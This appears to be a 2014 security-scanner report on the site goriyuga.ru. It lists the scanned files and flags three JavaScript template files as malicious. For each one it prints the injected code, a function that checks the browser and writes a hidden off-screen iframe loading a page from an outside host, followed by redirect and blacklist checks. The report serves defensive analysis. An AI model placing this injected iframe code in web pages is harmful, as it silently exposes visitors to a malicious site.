Scanned pages/files

| Request | Server response | Status |
|---|---|---|
| http://www.goriyuga.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 05 Sep 2014 18:05:21 GMT Location: http://goriyuga.ru/ Server: nginx/1.4.7 Content-Length: 0 Content-Type: text/html Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=fd0f62a386006e0d7386a043cf3f9661; path=/ X-Powered-By: PHP/5.2.17 | clean |
| http://goriyuga.ru/ | 200 OK Content-Length: 43007 Content-Type: text/html | clean |
| http://goriyuga.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/media/system/js/core.js | 200 OK Content-Length: 5384 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/media/system/js/caption.js | 200 OK Content-Length: 1329 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 599 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery-162.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery.easing.min.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/templates/full_screen_4/lib/js/supersized.3.2.1.js | 200 OK Content-Length: 37941 Content-Type: application/x-javascript | malicious |
| http://www.goriyuga.ru/templates/full_screen_4/lib/js/theme/supersized.shutter.js | 200 OK Content-Length: 12530 Content-Type: application/x-javascript | clean |
| http://www.goriyuga.ru/templates/full_screen_4/lib/js/UvumiDropdown.js | 200 OK Content-Length: 5930 Content-Type: application/x-javascript | malicious |
| http://www.goriyuga.ru/templates/full_screen_4/lib/js/tooltips.js | 200 OK Content-Length: 1135 Content-Type: application/x-javascript | malicious |
| http://stg.odnoklassniki.ru/share/odkl_share.js | 200 OK Content-Length: 12312 Content-Type: application/x-javascript | clean |
| http://vk.com/js/api/share.js?11 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
| http://vk.com/test404page.js | 404 Not Found Content-Length: 410 Content-Type: text/html | clean |
| http://vk.com/ | HTTP/1.1 200 OK Cache-Control: no-store Connection: close Date: Fri, 05 Sep 2014 18:05:31 GMT Pragma: no-cache Server: nginx/1.2.4 Content-Length: 16988 Content-Type: text/html; charset=windows-1251 Set-Cookie: remixlang=3; expires=Sat, 05 Sep 2015 15:12:15 GMT; path=/; domain=.vk.com X-Frame-Options: deny X-Powered-By: PHP/3.7744 | clean |
| http://vk.com/badbrowser.php | 200 OK Content-Length: 3524 Content-Type: text/html | clean |

Malicious code in http://www.goriyuga.ru/templates/full_screen_4/lib/js/supersized.3.2.1.js - confirmed by antiviruses (see below):

```javascript
function Grandarium() {
    var soset = navigator.userAgent;
    var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
    if (!unicode) {
        document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
    }
}
Grandarium();
// remainder of the scanner's excerpt: code from the original file
slide_links : 1, thumb_links : 1, show_bottombar : 1, show_prevnextbutton : 1, show_slidecounter : 0, show_imagetitle : 1, show_playbutton : 1, show_progressbar : 1, thumbnail_navigation : 0 }; jQuery.fn.supersized = function(options){ return this.each(function(){ (new jQuery.supersized(options)); }); }; })(jQuery);
```

Antivirus reports:

Malicious code in http://www.goriyuga.ru/templates/full_screen_4/lib/js/UvumiDropdown.js - confirmed by antiviruses (see below):

```javascript
function Grandarium() {
    var soset = navigator.userAgent;
    var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
    if (!unicode) {
        document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
    }
}
Grandarium();
```

Antivirus reports:

Malicious code in http://www.goriyuga.ru/templates/full_screen_4/lib/js/tooltips.js - confirmed by antiviruses (see below):

```javascript
function Grandarium() {
    var soset = navigator.userAgent;
    var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
    if (!unicode) {
        document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
    }
}
Grandarium();
// remainder of the scanner's excerpt: code from the original file
var content = element.get('title').split('::'); element.store('tip:title', content[0]); element.store('tip:text', content[1]); }); var tipz = new Tips('.tips',{ className: 'tips', fixed: true, hideDelay: 50, showDelay: 50 }); tipz.addEvents({ 'show': function(tip) { tip.fade('in'); }, 'hide': function(tip) { tip.fade('out'); } }); });
```

Antivirus reports:
Malicious Redirects

First query (normal visit):

```http
GET / HTTP/1.1
Host: goriyuga.ru
```

Result:

```http
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=8ef6380e6b06139cf36449c381f9fa9a; path=/
X-Powered-By: PHP/5.2.17
```
Second query (visit from a search engine):

```http
GET / HTTP/1.1
Host: goriyuga.ru
Referer: http://www.google.com/search?q=goriyuga.ru
```

Result: the same as for the first query. No suspicious redirects were found.
Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=goriyuga.ru
Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://goriyuga.ru/
Result: goriyuga.ru is not infected or malware details are not published yet.